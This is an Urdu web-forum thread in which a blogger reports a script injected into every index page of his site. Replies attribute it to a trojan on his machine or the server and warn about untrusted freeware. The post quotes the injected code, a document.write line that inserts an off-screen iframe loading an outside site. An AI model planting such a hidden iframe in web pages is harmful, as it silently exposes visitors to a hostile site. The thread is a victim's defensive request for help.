میری ویب سائیٹ کے ساتھ مسئلہ

بلال

محفلین
کل میں نے اپنے بلاگ پر ایک تحریر لکھی۔ فیس بک پر وہ تحریر خود بخود نہیں جا رہی تھی۔ یعنی فیڈ ٹھیک طرح سے کام نہیں کر رہی تھی۔ کافی تلاش کے بعد معلوم ہوا کہ میری ویب سائیٹ پر کوئی ایسا کوڈ ہے جس کو سٹاپ بیڈویئر کے کسی پاٹنر نے نقصان دہ کہہ دیا ہے جس کی وجہ سے یہ مسئلہ ہو رہا ہے۔ حیرانی یہ ہو رہی تھی کہ میں نے کہیں کوئی کوڈ تبدیل نہیں کیا پھر یہ مسئلہ کیسے آ رہا ہے؟ خیر میں نے تلاش کر لیا کہ پوری سائیٹ کے ہر ہر انڈیکس پیج پر ایک کوڈ خود بخود شامل ہو گیا ہے۔ جس کی وجہ سے یہ مسئلہ آرہا ہے۔ کوڈ یہ تھا۔
کوڈ:
<script>document.write('<iframe src="http://asfirey.com/?click=11666328" width=100 height=100 style="position:absolute;top:-10000;left:-10000;"></iframe>');</script>
کیا کوئی دوست میری اس بارے میں مدد کر سکتا ہے کہ یہ کوڈ خود بخود کیسے شامل ہو گیا ہے یا پھر اگر کسی نے کیا ہے تو اس نے کس طرح کیا ہو گا تاکہ میں اس کا کچھ بندوبست کر سکوں اور آئندہ اس مسئلہ سے محفوظ رہ سکوں۔
یاد رہے میری ویب سائیٹ کے تمام قسم کے پاسورڈ صرف میرے پاس ہیں میرے علاوہ اور کسی کے پاس نہیں۔ اس کے علاوہ اگر یہ کام میرے کمپیوٹر سے کسی وائرس نے کیا ہے تو پھر یہ مسئلہ ہر اس سائیٹ میں ہونا چاہئے تھا جو میں اپنے کمپیوٹر سے اپڈیٹ کرتا ہوں۔ لیکن یہ مسئلہ صرف میری ایک ویب سائیٹ اور اس کی سب ڈومین پر میرے بلاگ کے ساتھ ہوا ہے۔
 
یہ ایک قسم کا ٹروجن ہے۔ اور تقریباً ایسا ہی ایک ٹروجن کسی زمانے میں میرے ونڈوز مشین میں بھی کہیں‌تھا جو کہ سسٹم میں موجود ساری ایچ ٹی ایم ایل اور پی ایچ پی فائلوں میں ایک آئی فریم شامل کر دیتا تھا۔ اور پھر مجھے پوڑی ڈرائیو پر ایک فائنڈ اینڈ ریپلیس اسکرپٹ چلانی پڑتی تھی۔ خیر اس کے بعد میں نے لینکس استعمال کرنا شروع کر دیا تھا۔ کیوں‌کہ وہ میرے ونڈوز سے لینکس کی جانب ٹرانزیشن کا زمانہ تھا۔ اور پھر کبھی اس ٹروجن کی طرف پلٹ کر دیکھنا ہی نہیں پڑا۔ آپ دیکھئے شاید آپ کی مشین میں ہی کہیں کوئی ایسا کچھ موجود ہو یا‌ وہاں کچھ ہو یعنی سرور مشین پر۔
 
بلال

محفلین
بہت بہت شکریہ ابن سعید بھائی۔۔۔ میں دیکھتا ہوں اپنے کمپیوٹر کو اچھی طرح سے۔۔۔ ویسے میرے کمپیوٹر پر جو فائلز ہیں وہ بالکل ٹھیک ہیں بلکہ ویب سرور پر یعنی ہوسٹنگ پر جو فائلز تھی وہ خراب ہوئی ہیں اس کا مطلب ہوا کہ یہ ٹروجن ہوسٹنگ سرور پر ہے۔۔۔ چلو میں ہوسٹنگ کمپنی سے رابطہ کرتا ہوں۔۔۔
 
ریحان

محفلین
یہ ایک قسم کا ٹروجن ہے۔ اور تقریباً ایسا ہی ایک ٹروجن کسی زمانے میں میرے ونڈوز مشین میں بھی کہیں‌تھا جو کہ سسٹم میں موجود ساری ایچ ٹی ایم ایل اور پی ایچ پی فائلوں میں ایک آئی فریم شامل کر دیتا تھا۔ اور پھر مجھے پوڑی ڈرائیو پر ایک فائنڈ اینڈ ریپلیس اسکرپٹ چلانی پڑتی تھی۔ خیر اس کے بعد میں نے لینکس استعمال کرنا شروع کر دیا تھا۔ کیوں‌کہ وہ میرے ونڈوز سے لینکس کی جانب ٹرانزیشن کا زمانہ تھا۔ اور پھر کبھی اس ٹروجن کی طرف پلٹ کر دیکھنا ہی نہیں پڑا۔ آپ دیکھئے شاید آپ کی مشین میں ہی کہیں کوئی ایسا کچھ موجود ہو یا‌ وہاں کچھ ہو یعنی سرور مشین پر۔

سعید بھائی نے بلکل درست تشریح کی ہے ۔۔۔ ونڈوز مشین میں ویب کا کام کرنے والوں کو بہت ہی زیادہ محتاط رہنا چاہیے خاص طور پر جب وہ کوئی فری وئیر انسٹال کریں ۔

ہوتا کیا ہے کہ انٹینریٹ پر کافی ایسے فری پروگرامز ملتے ہیں جو کہ دعوی کرتے ہیں کے وہ آپ کے فلا فلا کام میں مدد کرے گے ۔۔ جیسے ویب ٹریفک میں اظافہ یا کچھ ایسے ہی ملتے جلتے کام ۔۔ تو کلائینٹ ان سافٹ وئیرز کا بظاہر مطالعہ کیے بغیر سسٹم میں اتار لیتے ہیں جو درست نہیں ۔

اور ہمیشہ اپنی ویب سائیٹ کے کوڈز کی چیک کرتے رہنا چاہیے ۔ یہ ہمارے سائیٹ کے کوڈز ہے جو ہماری سائیٹ کی رفتار پر بھی کہی جا کر پھر اثر انداز ہو جاتے ہیں ۔
 
Top